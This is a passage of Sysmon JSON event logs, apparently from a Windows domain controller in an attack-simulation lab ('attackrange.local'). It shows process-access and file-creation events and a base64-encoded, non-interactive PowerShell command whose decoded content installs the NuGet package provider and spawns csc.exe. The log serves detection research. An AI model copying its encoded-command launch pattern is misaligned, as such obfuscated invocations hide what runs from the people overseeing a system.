+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:15","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4425,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:15.373\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:15.373","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:15","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4426,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:15.373\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:15.373","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:15","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4427,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:15.373\r\nSourceProcessGUID: {A837DB8D-030D-5F25-0000-00106C530600}\r\nSourceProcessId: 4344\r\nSourceThreadId: 644\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-030F-5F25-0000-0010637A0600}\r\nTargetProcessId: 3112\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:15.373","SourceProcessGUID":"{A837DB8D-030D-5F25-0000-00106C530600}","SourceProcessId":"4344","SourceThreadId":"644","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-030F-5F25-0000-0010637A0600}","TargetProcessId":"3112","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:15","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4428,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:15.405\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-030F-5F25-0000-0010637A0600}\r\nTargetProcessId: 3112\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:15.405","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-030F-5F25-0000-0010637A0600}","TargetProcessId":"3112","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:15","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4429,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:15.420\r\nProcessGuid: {A837DB8D-030F-5F25-0000-0010637A0600}\r\nProcessId: 3112\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_jfhy2d3k.lzw.ps1\r\nCreationUtcTime: 2020-08-01 05:52:15.420","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:15.420","ProcessGuid":"{A837DB8D-030F-5F25-0000-0010637A0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_jfhy2d3k.lzw.ps1","CreationUtcTime":"2020-08-01 05:52:15.420","EventReceivedTime":"2020-08-01 05:52:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:15","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4430,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:15.451\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-030F-5F25-0000-0010637A0600}\r\nTargetProcessId: 3112\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:15.451","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-030F-5F25-0000-0010637A0600}","TargetProcessId":"3112","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:15","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4431,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:15.451\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-030F-5F25-0000-0010637A0600}\r\nTargetProcessId: 3112\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:15.451","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-030F-5F25-0000-0010637A0600}","TargetProcessId":"3112","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:16","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4432,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:52:16.217\r\nProcessGuid: {A837DB8D-030F-5F25-0000-0010637A0600}\r\nProcessId: 3112\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\2p1lmb1q\\2p1lmb1q.dll\r\nCreationUtcTime: 2020-08-01 05:52:16.217","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:52:16.217","ProcessGuid":"{A837DB8D-030F-5F25-0000-0010637A0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\2p1lmb1q\\2p1lmb1q.dll","CreationUtcTime":"2020-08-01 05:52:16.217","EventReceivedTime":"2020-08-01 05:52:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:16","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4433,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:16.217\r\nProcessGuid: {A837DB8D-030F-5F25-0000-0010637A0600}\r\nProcessId: 3112\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\2p1lmb1q\\2p1lmb1q.cmdline\r\nCreationUtcTime: 2020-08-01 05:52:16.217","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:16.217","ProcessGuid":"{A837DB8D-030F-5F25-0000-0010637A0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\2p1lmb1q\\2p1lmb1q.cmdline","CreationUtcTime":"2020-08-01 05:52:16.217","EventReceivedTime":"2020-08-01 05:52:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:16","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4434,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:16.227\r\nProcessGuid: {A837DB8D-0310-5F25-0000-0010879B0600}\r\nProcessId: 5108\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nFileVersion: 4.7.2053.0 built by: NET47REL1\r\nDescription: Visual C# Command Line Compiler\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: csc.exe\r\nCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\2p1lmb1q\\2p1lmb1q.cmdline\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-030D-5F25-0000-0020B5520600}\r\nLogonId: 0x652B5\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52\r\nParentProcessGuid: {A837DB8D-030F-5F25-0000-0010637A0600}\r\nParentProcessId: 3112\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsACAAPQAgAFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyAAoASQBuAHMAdABhAGwAbAAtAFAAYQBjAGsAYQBnAGUAUAByAG8AdgBpAGQAZQByACAALQBOAGEAbQBlACAATgB1AEcAZQB0ACAALQBNAGkAbgBpAG0AdQBtAFYAZQByAHMAaQBvAG4AIAAyAC4AOAAuADUALgAyADAAMQAgAC0ARgBvAHIAYwBlAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:16.227","ProcessGuid":"{A837DB8D-0310-5F25-0000-0010879B0600}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","FileVersion":"4.7.2053.0 built by: NET47REL1","Description":"Visual C# Command Line Compiler","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"csc.exe","CommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths 